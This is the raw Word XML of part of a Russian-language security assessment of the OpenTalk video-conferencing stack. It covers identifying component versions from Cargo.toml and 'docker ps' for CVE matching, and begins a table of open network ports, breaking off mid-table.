        <w:t>»</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="4C704E31" w14:textId="77777777" w:rsidR="004A7A62" w:rsidRDefault="004A7A62" w:rsidP="004A7A62">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D37D3D" w14:textId="6DBEACE7" w:rsidR="004A7A62" w:rsidRDefault="004A7A62" w:rsidP="004A7A62">
      <w:pPr>
        <w:pStyle w:val="1f6"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Sans CJK SC"/>
          <w:snapToGrid w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A7A62">
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Sans CJK SC"/>
          <w:snapToGrid w:val="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="610480F1" wp14:editId="257EECC8">
            <wp:extent cx="5884851" cy="640451"/>
            <wp:effectExtent l="0" t="0" r="1905" b="7620"/>
            <wp:docPr id="1866982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060" cy="65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53B3" w14:textId="0202AAC8" w:rsidR="004A7A62" w:rsidRPr="004A7A62" w:rsidRDefault="004A7A62" w:rsidP="004A7A62">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Sans CJK SC"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Ref234281831"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Sans CJK SC"/>
        </w:rPr>
        <w:t>Конфиг</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="27C6593A" w14:textId="77777777" w:rsidR="004A7A62" w:rsidRDefault="004A7A62" w:rsidP="004A7A62">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3579E49F" w14:textId="77777777" w:rsidR="004A7A62" w:rsidRDefault="004A7A62" w:rsidP="004A7A62">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB1AAB4" w14:textId="77777777" w:rsidR="004A7A62" w:rsidRDefault="004A7A62" w:rsidP="004A7A62">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF5B36F" w14:textId="550851D9" w:rsidR="004A7A62" w:rsidRPr="004A7A62" w:rsidRDefault="004A7A62" w:rsidP="004A7A62">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:sectPr w:rsidR="004A7A62" w:rsidRPr="004A7A62" w:rsidSect="004A7A62">
          <w:headerReference w:type="default" r:id="rId18"/>
          <w:footerReference w:type="default" r:id="rId19"/>
          <w:footerReference w:type="first" r:id="rId20"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1134" w:right="851" w:bottom="851" w:left="1701" w:header="567" w:footer="340" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="381"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64C39634" w14:textId="4A7C5D79" w:rsidR="004005A2" w:rsidRPr="00AB7761" w:rsidRDefault="00465B2E" w:rsidP="004005A2">
      <w:pPr>
        <w:pStyle w:val="1f1"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00465B2E">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Внутренние микросервисы посредством анализа программных компонентов определяются, но для этого нужен доступ к серверу. Так, версия компонента </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00465B2E">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00465B2E">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> может быть установлена напрямую из файла конфигурации сборки </w:t>
      </w:r>
      <w:r w:rsidRPr="009A505E">
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00465B2E">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Cargo.toml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00495F80">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00465B2E">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref234281831 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00465B2E">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:instrText>\</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">рисунок </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00465B2E">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>, а версии остальных компонентов стенда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00465B2E">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> из списка запущенных </w:t>
      </w:r>
      <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00465B2E">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00465B2E">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-контейнеров</w:t>
      </w:r>
      <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00465B2E">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, где версия явно указана в имени образа </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref234281845 \r \h \</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>рисунок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B51C35" w14:textId="467126F8" w:rsidR="00EA0F3B" w:rsidRDefault="00EA0F3B" w:rsidP="00EA0F3B">
      <w:pPr>
        <w:pStyle w:val="120"/>
      </w:pPr>
      <w:r>
        <w:t>Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79562145" w14:textId="349D68F8" w:rsidR="006F72DC" w:rsidRPr="002C5A1E" w:rsidRDefault="006F72DC" w:rsidP="006F72DC">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
      <w:r w:rsidRPr="002C5A1E">
        <w:t xml:space="preserve">Внутренние </w:t>
      </w:r>
      <w:r w:rsidR="00C54DEE" w:rsidRPr="002C5A1E">
        <w:t>контейнеры</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5A1E">
        <w:t xml:space="preserve"> посредством анализа программных компонентов определяются, но для этого нужен доступ к серверу. В отличие от внешнего сканирования, раскрывавшего лишь версию </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:t>Nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C5A1E">
        <w:t xml:space="preserve"> и факт использования </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C5A1E">
        <w:t xml:space="preserve">, команда </w:t>
      </w:r>
      <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5A1E">
        <w:rPr>
          <w:rStyle w:val="1fa"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5A1E">
        <w:rPr>
          <w:rStyle w:val="1fa"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B5B72" w:rsidRPr="002C5A1E">
        <w:rPr>
          <w:rStyle w:val="1fa"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r w:rsidR="006B5B72" w:rsidRPr="006B5B72">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="006B5B72" w:rsidRPr="00465B2E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B5B72" w:rsidRPr="002C5A1E">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5A1E">
        <w:t xml:space="preserve"> файл </w:t>
      </w:r>
      <w:r w:rsidR="002C5A1E" w:rsidRPr="009A505E">
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C5A1E" w:rsidRPr="00465B2E">
        <w:t>Cargo.toml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C5A1E" w:rsidRPr="00495F80">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="002C5A1E" w:rsidRPr="00465B2E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C5A1E">
        <w:t>дают точные версии всех компонентов</w:t>
      </w:r>
      <w:r w:rsidR="00C54DEE" w:rsidRPr="002C5A1E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5A1E">
        <w:t xml:space="preserve"> что позволяет достоверно сопоставить каждый из них с CVE в NVD и</w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00763E44">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5A1E">
        <w:t xml:space="preserve"> БДУ ФСТЭК. При этом метод применим только при легитимном аудите</w:t>
      </w:r>
      <w:r w:rsidR="002C5A1E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C5A1E">
        <w:t>поскольку требуе</w:t>
      </w:r>
      <w:r w:rsidR="002C5A1E">
        <w:t xml:space="preserve">т </w:t>
      </w:r>
      <w:r w:rsidRPr="002C5A1E">
        <w:t>доступа к файловой системе сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF0D6F3" w14:textId="784754DD" w:rsidR="00EA0F3B" w:rsidRPr="00EA0F3B" w:rsidRDefault="00EA0F3B" w:rsidP="00EA0F3B">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="673395BF" w14:textId="4DE8C275" w:rsidR="003E758A" w:rsidRPr="00EA0F3B" w:rsidRDefault="00EA0F3B" w:rsidP="003E758A">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA0F3B">
        <w:lastRenderedPageBreak/>
        <w:t>Анализ защищенности</w:t>
      </w:r>
      <w:r w:rsidR="004005A2">
        <w:t xml:space="preserve"> ПО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEED9BB" w14:textId="2360C0DF" w:rsidR="000F1C53" w:rsidRDefault="000F1C53" w:rsidP="000F1C53">
      <w:pPr>
        <w:pStyle w:val="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сетевые протоколы </w:t>
      </w:r>
      <w:r w:rsidR="00AB7761">
        <w:t>ПО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2282B219" w14:textId="0B43055C" w:rsidR="002A383D" w:rsidRPr="00F42695" w:rsidRDefault="003A5828" w:rsidP="002A383D">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F42695">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>набора</w:t>
      </w:r>
      <w:r w:rsidR="00F42695" w:rsidRPr="00F42695">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F42695">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>контейнеров</w:t>
      </w:r>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">, развёрнутых в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, сетевое взаимодействие реализуется несколькими прикладными протоколами</w:t>
      </w:r>
      <w:r w:rsidR="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A383D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="002A383D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>поверх</w:t>
      </w:r>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A383D">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="003F66DD">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="003F66DD">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>REST</w:t>
      </w:r>
      <w:r w:rsidR="00F42695">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">API, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>специализированны</w:t>
      </w:r>
      <w:r w:rsidR="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>ми</w:t>
      </w:r>
      <w:r w:rsidR="002A383D" w:rsidRPr="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> протокол</w:t>
      </w:r>
      <w:r w:rsidR="002A383D">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">ами </w:t>
      </w:r>
      <w:r w:rsidR="00EF198B">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>СУБД,</w:t>
      </w:r>
      <w:r w:rsidR="00EF198B" w:rsidRPr="00F42695">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>AMQP, S</w:t>
      </w:r>
      <w:r w:rsidR="00F42695" w:rsidRPr="00F42695">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="003F66DD">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Результат анализа протоколов представлены в </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="003F66DD">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="003F66DD">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref234282626 \r \h \</w:instrText>
      </w:r>
      <w:r w:rsidR="003F66DD">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r w:rsidR="003F66DD">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="003F66DD">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>таблице</w:t>
      </w:r>
      <w:r w:rsidR="003F66DD">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.1</w:t>
      </w:r>
      <w:r w:rsidR="003F66DD">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:rPr>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E56DAFF" w14:textId="0F86FE0E" w:rsidR="00355459" w:rsidRDefault="00355459" w:rsidP="003F66DD">
      <w:pPr>
        <w:pStyle w:val="19"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Ref234282626"/>
      <w:r>
        <w:t xml:space="preserve">Список </w:t>
      </w:r>
      <w:r w:rsidR="007D077A">
        <w:t xml:space="preserve">открытых сетевых портов ПО </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5828">
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13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50"/>
        <w:gridCol w:w="2192"/>
        <w:gridCol w:w="1401"/>
        <w:gridCol w:w="1990"/>
        <w:gridCol w:w="1251"/>
        <w:gridCol w:w="1960"/>
      </w:tblGrid>
      <w:tr w:rsidR="00804C86" w14:paraId="4361BDA9" w14:textId="77777777" w:rsidTr="001B7E9E">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader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56D1" w14:textId="02B4FB24" w:rsidR="00804C86" w:rsidRPr="00C82B97" w:rsidRDefault="00804C86" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="14" w:name="_Hlk229504400"/>
            <w:r w:rsidRPr="00C82B97">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>№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FF66" w14:textId="58D76EAA" w:rsidR="00804C86" w:rsidRPr="00C82B97" w:rsidRDefault="00804C86" w:rsidP="00C27C90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Прослушиваемый интерфейс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E37E" w14:textId="04279C4E" w:rsidR="00804C86" w:rsidRPr="00C82B97" w:rsidRDefault="00804C86" w:rsidP="00C27C90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Порт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34B6A" w14:textId="35DD97E4" w:rsidR="00804C86" w:rsidRPr="00C82B97" w:rsidRDefault="00804C86" w:rsidP="00C27C90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Протокол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0FC18" w14:textId="77777777" w:rsidR="00804C86" w:rsidRPr="00C82B97" w:rsidRDefault="00804C86" w:rsidP="00C27C90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Процесс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415B6" w14:textId="77777777" w:rsidR="00804C86" w:rsidRPr="00C82B97" w:rsidRDefault="00804C86" w:rsidP="00C27C90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Назначение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00804C86" w14:paraId="72820403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16B5" w14:textId="741336D8" w:rsidR="00804C86" w:rsidRPr="00804C86" w:rsidRDefault="00804C86" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>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F134" w14:textId="2809701E" w:rsidR="00804C86" w:rsidRPr="004B22D3" w:rsidRDefault="004B22D3" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>Глобальная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9818F" w14:textId="77B58125" w:rsidR="00804C86" w:rsidRPr="002D3CBF" w:rsidRDefault="002D3CBF" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>443</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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BB0D" w14:textId="292739DC" w:rsidR="00804C86" w:rsidRDefault="002D3CBF" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D3CBF">
              <w:t>HTTPS (TLS 1.2/1.3)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9F76" w14:textId="67378EEB" w:rsidR="00804C86" w:rsidRDefault="003A5828" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Nginx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657B" w14:textId="5E8522DC" w:rsidR="00804C86" w:rsidRPr="003329EF" w:rsidRDefault="003329EF" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
